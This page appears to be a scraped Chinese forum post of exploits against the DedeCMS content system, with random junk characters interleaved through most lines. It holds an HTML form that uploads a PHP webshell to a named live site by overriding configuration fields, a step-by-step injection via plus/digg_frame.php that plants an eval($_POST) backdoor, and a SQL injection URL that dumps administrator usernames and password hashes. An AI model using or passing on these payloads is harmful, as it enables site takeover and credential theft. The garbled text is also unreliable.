<head>
9 ~2 G5 U+ Z5 X3 n, F* S<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
1 o- P0 P/ @/ v( E</head>' f. Y, r: Z3 e2 p9 H1 N/ r; P
<body style="FONT-SIZE: 9pt">, |" X Z( M% _) Y) ~: U
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />4 Y' {2 R1 @& f, i6 n# l2 J( c8 H
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
9 B7 R, J2 ]7 X: m4 X( F) ]$ Y5 s<input type='hidden' name='activepath' value='/data/cache/' />
3 ?3 W6 O3 w" b, _# ?+ G! u7 s<input type='hidden' name='cfg_basedir' value='../../' />
& ?* {" c: p4 o% ~) P2 {<input type='hidden' name='cfg_imgtype' value='php' />
6 e$ e4 L) C" B1 x+ J8 Q- p z! ]<input type='hidden' name='cfg_not_allowall' value='txt' />/ Z8 U* e$ A% J8 P0 h) {% I
<input type='hidden' name='cfg_softtype' value='php' />6 q; E- A* e# K2 z- R+ R4 k v- q
<input type='hidden' name='cfg_mediatype' value='php' />! ^: f! j" G7 r7 Q3 k
<input type='hidden' name='f' value='form1.enclosure' />& U8 ?( G/ D% Z# v
<input type='hidden' name='job' value='upload' />
+ c, R- f, ~1 d% F* Z<input type='hidden' name='newname' value='fly.php' />6 p- P8 T8 c7 M% \' G
Select U Shell <input type='file' name='uploadfile' size='25' />/ p) m+ E9 n( j7 A L& [7 {
<input type='submit' name='sb1' value='确定' />
) r% s: Y( @, Z</form>2 @8 K: s! ^5 o' }# E2 p% C4 f
<br />It's just a exp for the bug of Dedecms V55...<br />
# O0 [8 b. @" l- J" |- lNeed register_globals = on...<br />
8 h5 t/ s$ v% V7 e) hFun the game,get a webshell at /data/cache/fly.php...<br />
" L* b4 j9 z( B7 s" |</body>( d- w$ w V5 {6 p4 B
</html>3 I( j4 i: G7 t: `
}/ N/ i+ |' y( r; m& A) \; _6 y# K/ F
' a" `, x; R" S# P9 a! R( Q
* [. a4 Y: V/ s! }& J) {, E
9 z* q8 I! H) i) g* w4 ^% W
+ [& E4 k' T* T' r
9 B2 L ^% p5 P6 o* W. S6 p
( L+ E! [6 U7 v4 j: m1 c
% K8 Z! D. N+ \1 ?5 f$ V) f" \4 q# ]+ R2 b# K: T
织梦(dedecms)5.3 – 5.5 plus/digg_frame.php 注入漏洞) ?+ `9 i9 v, ^% N. ~" L
利用了MySQL字段数值溢出引发错误和DEDECMS用PHP记录数据库错误信息并且文件头部没有验证的漏洞。8 D3 Y3 [ R0 A% A- I7 U; B0 a
1. 访问网址:
* _& F) p# A# {http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>- K( G4 u7 v! x8 s5 m! h8 B
可看见错误信息
- C: O2 j: Q! o0 U$ w! w' I w( L, \ \
; ]3 k' A. o p' U8 g- u2. 访问 http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。
& N$ W# Y* c2 _- y0 ?( ~int(3) Error: Illegal double '1024e1024' value found during parsing
2 l6 Y4 ^* b1 F- ?Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>5 f- [; X3 f: T- v8 Z; H
) u6 p6 q; i. P# |
' }2 m4 B3 A% D3. 执行dede.rar里的文件 test.html,注意 form 中 action 的地址是
+ @& ^7 b$ J7 x x l' T" \( \7 E9 E- C& U& Q* ^& C
2 f) m- Y" R3 f! M: e" c<form action=”http://www.abc.com/data/mysql_error_trace.php” enctype=”application/x-www-form-urlencoded” method=”post”>
6 L" K4 R; V- R7 L' }% i& e) O* P- T5 K5 l# h; X5 W( @
) H$ G J0 q/ ?2 U1 y9 a
按确定后的看到第2步骤的信息表示文件木马上传成功.
; F' A4 I! W# d2 D9 }! E
" b% j: i% y" j* O; d$ z! I0 M9 @1 I. U6 Y# _1 B
: K5 v b( e0 M }; |$ M
7 ?5 E4 Q7 i w# L( K5 c2 P& w
/ h- |: k/ f$ }0 R% W# B$ ] k
" l$ x+ r/ `& O) ^. f. e( m8 i, j, P: b1 }
: z9 ]6 A$ N3 J9 M
5 c6 ?/ z0 ^7 G. \! E8 O' b5 `' y5 \' @. G2 K% z8 h# B/ c
* w1 o8 N6 w* ~织梦(DedeCms)plus/infosearch.php 文件注入漏洞
0 ?/ |4 t/ O% fhttp://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/* |
|